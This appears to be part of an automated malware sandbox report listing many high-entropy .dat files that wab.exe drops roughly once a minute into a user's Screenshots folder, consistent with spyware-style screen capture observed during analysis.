Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183324.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203442.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183424.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203542.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183524.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203643.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183624.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203743.dat entropy: 7.99894349391 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183724.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203845.dat entropy: 7.99902079555 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183824.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203945.dat entropy: 7.99902079555 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183924.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204045.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184024.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165510.dat entropy: 7.99872222674 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165613.dat entropy: 7.99879120792 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165713.dat entropy: 7.99874750746 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165813.dat entropy: 7.99872867954 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165913.dat entropy: 7.99868252054 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170013.dat entropy: 7.99882509689 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170114.dat entropy: 7.99882509689 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170214.dat entropy: 7.99885012096 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170314.dat entropy: 7.99885012096 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204145.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184124.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204246.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184224.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204346.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184324.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204446.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184424.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204546.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184525.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204648.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184625.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204748.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184725.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204849.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184825.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204949.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184925.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205049.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185025.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170414.dat entropy: 7.99868252054 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170514.dat entropy: 7.99868252054 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170614.dat entropy: 7.99870003625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170714.dat entropy: 7.99870003625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170814.dat entropy: 7.99885532888 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170914.dat entropy: 7.99877958233 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171014.dat entropy: 7.99877958233 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171115.dat entropy: 7.9986084329 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171215.dat entropy: 7.9986084329 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205150.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185125.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205250.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185225.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205350.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185325.dat entropy: 7.99902079555 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205452.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185425.dat entropy: 7.99902079555 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205553.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185526.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205653.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185626.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205754.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185726.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205854.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185826.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205954.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185926.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210057.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190026.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171315.dat entropy: 7.9986084329 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171415.dat entropy: 7.9986084329 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171515.dat entropy: 7.9986084329 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171615.dat entropy: 7.9986084329 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171715.dat entropy: 7.9986084329 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171815.dat entropy: 7.9986084329 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171915.dat entropy: 7.9986084329 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172015.dat entropy: 7.9986084329 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172115.dat entropy: 7.9986084329 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172215.dat entropy: 7.9986084329 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210157.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190126.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210258.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190226.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210358.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190326.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210458.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190426.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210559.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190526.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210701.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190626.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210801.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190726.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210902.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190827.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211002.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190927.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211102.dat entropy: 7.99910363038 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191027.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172315.dat entropy: 7.99883063371 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172416.dat entropy: 7.99885970705 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172516.dat entropy: 7.99892931724 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172616.dat entropy: 7.99890212384 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172716.dat entropy: 7.99894731837 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172816.dat entropy: 7.9989227553 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172916.dat entropy: 7.9989227553 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173016.dat entropy: 7.9989227553 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173116.dat entropy: 7.99894731837 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173216.dat entropy: 7.99889616701 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211205.dat entropy: 7.99900846116 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191127.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211306.dat entropy: 7.99900846116 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191227.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211406.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191327.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211509.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191427.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211609.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191527.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211709.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191627.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211810.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191727.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211910.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191827.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212013.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191927.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212113.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192028.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173316.dat entropy: 7.99895904916 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173416.dat entropy: 7.99890940863 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173517.dat entropy: 7.99890940863 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173617.dat entropy: 7.99890940863 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173717.dat entropy: 7.99895904916 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173817.dat entropy: 7.99895904916 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173917.dat entropy: 7.99895904916 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174017.dat entropy: 7.99890940863 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174117.dat entropy: 7.99890940863 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174217.dat entropy: 7.99890940863 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192128.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192228.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192328.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192428.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192528.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192628.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192728.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192828.dat entropy: 7.99874704808 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192928.dat entropy: 7.99902079555 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193028.dat entropy: 7.99902079555 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174317.dat entropy: 7.99895023393 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174417.dat entropy: 7.99895808296 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174517.dat entropy: 7.99885695321 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174617.dat entropy: 7.99885695321 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174718.dat entropy: 7.99885695321 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174818.dat entropy: 7.99885695321 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174918.dat entropy: 7.99885695321 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175018.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175118.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175218.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193129.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193229.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193329.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193429.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193529.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193629.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193729.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193829.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193929.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194029.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175318.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175418.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175518.dat entropy: 7.99880335139 Jump to dropped file
